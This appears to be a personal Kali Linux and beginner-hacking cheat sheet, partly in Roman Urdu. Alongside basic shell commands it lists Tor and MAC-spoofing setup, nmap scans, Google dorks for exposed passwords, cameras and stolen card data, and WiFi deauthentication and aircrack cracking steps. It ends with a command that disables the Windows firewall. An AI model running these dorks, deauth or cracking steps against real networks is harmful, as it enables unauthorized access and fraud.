*01.  cd                 	(Change Directory).
*02.  ls                 	(lists of folders in a specific path) , (dir) in windows.
*03.  ls -l or ls -la		(shows root permissions, lists with more details).
*04.  lsusb              	(lists of available USB Ports).
*05.  ifconfig           	(Network Configuration, IP Details), (ipconfig) in Windows.
*06.  "cd .." or "cd -"		(to go back).
*07.  cd /			(To Navigate into the root Directory).
*08.  "cd" or "cd ~"		(To Navigate to your Home Directory, cd ~ means /home/username).
*09.  cd ~/Desktop		(Go to Desktop).
*10.  --help             	(To check true command).
*11.  clear              	(To clear screen of terminal).
*12.  ping WebsiteName   	(ping google.com).
*13.  Tab Button         	(choose known folder/file name).              	
*14.  bash			(bash means False Command).
*15.  sudo apt-get update       (for updation in Kali Linux).
*16.  sudo apt-get upgrade      (upgrade Kali Linux to New Version) , (1st run update then run upgrade command).
*17.  poweroff           	(shutdown Kali Linux).
*18.  reboot		 	(Restart Kali Linux).
*19.  nano		 	(Editor in Kali Linux, nano file_name to edit files).
*20.  #			 	(Comments).
*21.  ctrl^c		 	(Interrupt Occur).(^ used/stands for Ctrl Control Button).
*22.  ^o (ctrl^o)	 	(Save in Nano Editor).
*23.  ^x (ctrl^x)	 	(Exit in Nano Editor).
*24.  uname		 	(--help , Linux Version's Detail).
*25.  sudo apt-get install virtualbox-guest-dkms	(Install Linux Headers).
*26.  pwd			(current Present Working Directory starting from root (/)).
*27.  echo "Text" > File_Name	(To Create Text File using Terminal, simply echo prints Text).
*28.  cp file_name /copy_dir	(To Copy Files in other Directories, cp -v command for more details copy).
*29.  mv file_name /copy_dir	(To Cut / Move Files in other Directories).
*30.  mv first_name second_name	(To Rename Files using move command, if you move also then give 4th parameter of directory).
*31.  cat file_name		(To Read any File in terminal).
*32.  less file_name		(To display file contents or command output one page at a time in terminal).
*33.  grep			(Search / Filter out in Files, cat file_name | grep search_word). | means Pipe Symbol
*34.  touch file_names		(To create different files, separate every file_name using space).
*35.  mkdir folder_name		(To create folder / directory).
*36.  chown root:root file_name	(Give root permission to files, first root shows group second root shows username).
*37.  rm (Remove)		(To Delete Files).
*38.  rmdir			(Removes Empty Directories).
*39.  sudo su			(To go Root Mode directly in Linux 2020).
*40.  wget			(Download Files through Links).
*41.  


*00.  chmod, man, tcpdump, usermod, help (--help or -h)....
https://github.com/Ebazhanov/linkedin-skill-assessments-quizzes/blob/master/linux/linux-assesment.md

------------------------------------------------------------------------------------------------------------------

  ___Socks ProxyChains:___

1. sudo su (if root access needed)
2. nano /etc/proxychains.conf (select dynamic_chain and add socks, visit socks-proxy.net for more socks)
3. apt-get install tor (if tor not installed)
4. tor --version (to check tor installed or not)
5. service tor start
6. service tor status
7. proxychains firefox (serach_engine / web name optional)
8. service tor restart

------------------------------------------------------------------------------------------------------------------

  ___Configure VPN and DNS:___

1. download VPNs from vpnBook.com
2. openvpn --config vpn_name
_______
3. sudo nano /etc/resolv.conf
4. add new nameservers from opendns.com and comment previous one

------------------------------------------------------------------------------------------------------------------

  ___MACchanger:___

1. ifconfig (show all details)   OR   ifconfig eth0 (show only ethernet details)
2. macchanger -s eth0 (to show current original MAC address)
3. sudo ifconfig eth0 down
4. sudo macchanger -r eth0 (change MAC address randomly)
5. sudo ifconfig eth0 up
6. sudo macchanger -p eth0 (go back original MAC address)
_______
7. crontab -e (permanent change MAC even after reboot, ChronosTable makes automatic schedule work)
8. @reboot macchanger -r eth0 (add this line in editor)
9. ifconfig eth0 | grep ether (grep search MAC address in ethernet)

------------------------------------------------------------------------------------------------------------------

  ___Nmap and GEO IP:___

1. nslookup scanme.nmap.org   OR   nslookup any_IP
2. nmap scanme.nmap.org   OR   nmap -v scanme.nmap.org
3. nmap -oG - 192.168.1.1-255 -p 22 -vv > myscan_file
4. less myscan_file | grep Up   OR   cat myscan_file | grep Up
5. cat myscan_file | grep Up | awk -F " " '{print $2}' (awk filter patterns with Flag after space print column2, we can save it in a file using "> file")
6. nmap -vv -iL file (scan open ports of given IPs)
_______
7. nslookup scanme.nmap.org
8. curl ipinfo.io/45.33.32.156 (to know complete GEO details of an IP through Client URL with any supported protocol)

------------------------------------------------------------------------------------------------------------------

=> Social Engineering Tools (Phishers):  "Maltego", "Terminal: sudo setoolkit".
=> Sniffing Tools (Sniffers):  "WireShark", "Terminal: ettercap", "Cain and Abel for Windows", "Evil Twin Attack".

------------------------------------------------------------------------------------------------------------------

  ___Google Advance Searching (Force Operators):___

 site: insite: inurl: intitle: intext
 filetype:pdf
 +student (OR)		(yeh word plus wala lazmi ho search results mein, matlab student related search).
 -fruit			(is minus waly word ky related search na ho).
 "Sentence"		(isi order mein sentence ko search karo jahan bhi hai, "job" +email).
 Hum * sy Allah		(Wild Card baqi words same but * ki jagah jo marzi fit kar lo, kuch kuch yaad hai tab yeh method).
 related:amazon.in	(amazon jaisi websites show karo online shopping related).
_______
**Queries:** (can be made yourself too)

 index.of.dcim		(shows Cloud attached Camera's Videos and images).
 index.of.backup	(root folder is index and then /backup directory).
 index.of.password
 filetype:txt username password @gmail.com
 inurl:webarch/mainframe.cgi	(Online Hacked Printers)
 intitle:"multimon ups status page"
 intitle:"SpeedStream router Management interface"
 intitle:"VNC viewer for java"	(VNC: Virtual Network Computing)
 inurl:main.cgi linksys		(display online security cameras)
 filetype:txt card cvv		(Hacked cards and Hackers onlined them)
 "ReZult" ATM PIN
 robots.txt	(google.com/robots.txt , which searches are allowed or not, behaviors)

 whois IP, :port
 The Wizard of Oz   ,   Chandler Bing   ,   do a barrel roll

------------------------------------------------------------------------------------------------------------------

  ___Cookies:___

1. tar -xf file   OR   chmod file (to UnZip file)
2. ./file (run specific .pl file like .exe in windows)
3. (USB Stealer)

------------------------------------------------------------------------------------------------------------------

  ___Wireless:___

ifconfig for all and iwconfig for only wireless card

1. sudo airmon-ng start wlan0
2. sudo airodump-ng wlan0mon
3. airodump-ng -w file -c 11 --bssid 34:BF:90:1C:C8:F9 wlan0mon
4. aireply-ng -0 0 -a 34:BF:90:1C:C8:F9 wlan0mon	(-0 means deauthentication, 0 unlimited time, -a mentions BSSID filter client)
5. aircrack-ng file.cap -w rockyou.txt		{Crunch (wordlist generator), John the Ripper (password cracking software)}

------------------------------------------------------------------------------------------------------------------

  ___MAC Address Filtering in WiFi:___

1. sudo airmon-ng start wlan0
2. sudo airodump-ng wlan0mon
3. sudo ifconfig wlan0 down
4. sudo macchanger -m A8:6B:AD:76:E9:43 wlan0
5. sudo ifconfig wlan0 up
6. iwconfig wlan0 essid CyberHawk channel 11	(associate Access Point)

------------------------------------------------------------------------------------------------------------------

netsh advfirewall set currentprofile state off   =>  Disable (Turn Off) Windows Firewall